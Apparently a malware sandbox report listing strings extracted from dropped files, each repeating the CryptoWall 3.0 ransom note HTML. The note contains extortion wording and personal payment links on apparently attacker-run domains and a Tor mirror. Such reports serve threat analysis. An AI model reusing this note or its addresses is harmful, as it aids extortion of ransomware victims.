Source: restore_files_gpmus.html323.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html96.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html279.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt156.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt173.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt301.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html111.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt135.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt306.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt351.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt419.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html155.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html166.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html406.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html249.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt231.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html59.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt168.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html241.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt216.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html358.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html143.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow 